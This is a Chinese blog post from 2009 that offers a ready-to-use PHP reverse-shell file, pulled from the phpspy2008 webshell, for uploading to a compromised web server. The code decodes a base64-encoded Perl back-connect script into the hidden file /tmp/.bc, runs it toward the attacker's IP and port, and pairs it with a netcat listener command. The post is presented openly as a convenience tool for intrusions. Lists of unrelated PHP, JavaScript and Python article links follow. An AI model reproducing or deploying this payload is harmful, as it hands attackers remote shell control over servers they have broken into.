php反弹shell实现代码


Posted in PHP onApril 22, 2009

非常无 奈,没想 到什么好的办法,后来灵光一闪。放一个php页面,里面 可以直接弹回来shell,何况在console下面操作比webshell方便的多,也不会出现超时之类的情况。
因为我不怎么懂php,于是就找了猥琐 的诺诺和小雨修改了一下代码,反弹代码是从phpspy2008里面提取的,但是不能直接用,需要修改成一个单独的php文件。上传之后,本地监听一个端 口,在代码里设置好反弹IP和端口,然后直接访问,就会弹回来一个shell。
声明,没啥技术含量,主要是用来方便。这样每次可以直接访问这个php页面,直接弹回来shell,不用做其他繁琐的操作,下面贴出来已经修改好的代码

<?php 
function which($pr) { 
$path = execute("which $pr"); 
return ($path ? $path : $pr); 
} 
function execute($cfe) { 
$res = ''; 
if ($cfe) { 
if(function_exists('exec')) { 
@exec($cfe,$res); 
$res = join("\n",$res); 
} elseif(function_exists('shell_exec')) { 
$res = @shell_exec($cfe); 
} elseif(function_exists('system')) { 
@ob_start(); 
@system($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(function_exists('passthru')) { 
@ob_start(); 
@passthru($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(@is_resource($f = @popen($cfe,"r"))) { 
$res = ''; 
while(!@feof($f)) { 
$res .= @fread($f,1024); 
} 
@pclose($f); 
} 
} 
return $res; 
} 
function cf($fname,$text){ 
if($fp=@fopen($fname,'w')) { 
@fputs($fp,@base64_decode($text)); 
@fclose($fp); 
} 
} 
$yourip = "your IP"; 
$yourport = 'your port'; 
$usedb = array('perl'=>'perl','c'=>'c'); 
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". 
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". 
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". 
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". 
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". 
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". 
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
cf('/tmp/.bc',$back_connect); 
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); 
?>

先在本地执行 nc -l -vv -p port 然后访问这个php页面 http://www.site.com/fuck.php 本地就会得到一个反弹的shell。
仅限猥琐流使用,如果有什么好的猥琐的方法,请不吝赐教
PHP 相关文章推荐
php中文件上传的安全问题
Oct 09 PHP
经典的PHPer为什么被认为是草根?
Apr 02 PHP
php 网页播放器用来播放在线视频的代码(自动判断并选择视频文件类型)
Jun 03 PHP
PHP5中新增stdClass 内部保留类
Jun 13 PHP
解析yahoo邮件用phpmailer发送的实例
Jun 24 PHP
10个实用的PHP正则表达式汇总
Oct 23 PHP
smarty内置函数config_load用法实例
Jan 22 PHP
实例讲解php数据访问
May 09 PHP
PHP curl 或 file_get_contents 获取需要授权页面的方法
May 05 PHP
yii2中LinkPager增加总页数和总记录数的实例
Aug 28 PHP
php 中self,this的区别和操作方法实例分析
Nov 04 PHP
yii框架结合charjs统计上一年与当前年数据的方法示例
Apr 04 PHP
将数组写入txt文件 var_export
Apr 21 #PHP
php 保留小数点
Apr 21 #PHP
PHP 中执行排序与 MySQL 中排序
Apr 21 #PHP
一个php导出oracle库的php代码
Apr 20 #PHP
php一句话cmdshell新型 (非一句话木马)
Apr 18 #PHP
对squid中refresh_pattern的一些理解和建议
Apr 17 #PHP
PHP 加密与解密的斗争
Apr 17 #PHP
You might like
Smarty中调用FCKeditor的方法
2014/10/27 PHP
使用ThinkPHP的自动完成实现无限级分类实例详解
2016/09/02 PHP
总结PHP中初始化空数组的最佳方法
2019/02/13 PHP
JavaScipt基本教程之JavaScript语言的基础
2008/01/16 Javascript
js 学习笔记(三)
2009/12/29 Javascript
EXTJS FORM HIDDEN TEXTFIELD 赋值 使用value不好用的问题
2011/04/16 Javascript
javascript中的undefined和not defined区别示例介绍
2014/02/26 Javascript
jQuery中大家不太了解的几个方法
2015/03/04 Javascript
nodejs初步体验篇
2015/11/23 NodeJs
js运动应用实例解析
2015/12/28 Javascript
Javascript闭包与函数柯里化浅析
2016/06/22 Javascript
详解基于webpack搭建react运行环境
2017/06/01 Javascript
Three.js实现绘制字体模型示例代码
2017/09/26 Javascript
JavaScript动态加载重复绑定问题
2018/04/01 Javascript
浅谈Vue页面级缓存解决方案feb-alive(上)
2019/04/14 Javascript
Angular请求防抖处理第一次请求失效问题
2019/05/17 Javascript
layui--select使用以及下拉框实现键盘选择的例子
2019/09/24 Javascript
JavaScript实现密码强度实时验证
2020/03/18 Javascript
[02:56]DOTA2亚洲邀请赛 VG出场战队巡礼
2015/02/07 DOTA
Python常见文件操作的函数示例代码
2011/11/15 Python
Python3.遍历某文件夹提取特定文件名的实例
2018/04/26 Python
对pandas处理json数据的方法详解
2019/02/08 Python
pandas实现将dataframe满足某一条件的值选出
2019/06/12 Python
python logging添加filter教程
2019/12/24 Python
解决tensorboard多个events文件显示紊乱的问题
2020/02/15 Python
python实现超级玛丽游戏
2020/03/18 Python
Python类和实例的属性机制原理详解
2020/03/21 Python
CSS实现限制字数功能当对象内文本溢出时显示省略标记
2014/08/20 HTML / CSS
html5新特性与用法大全
2018/09/13 HTML / CSS
x-ua-compatible content=”IE=7, IE=9″意思理解
2013/07/22 HTML / CSS
经典c++面试题六
2012/01/18 面试题
个人实用简单的自我评价
2013/10/19 职场文书
设计总监岗位职责
2013/12/07 职场文书
《鸟岛》教学反思
2014/04/26 职场文书
小学生民族团结演讲稿
2014/08/27 职场文书
精神文明建设汇报材料
2014/12/24 职场文书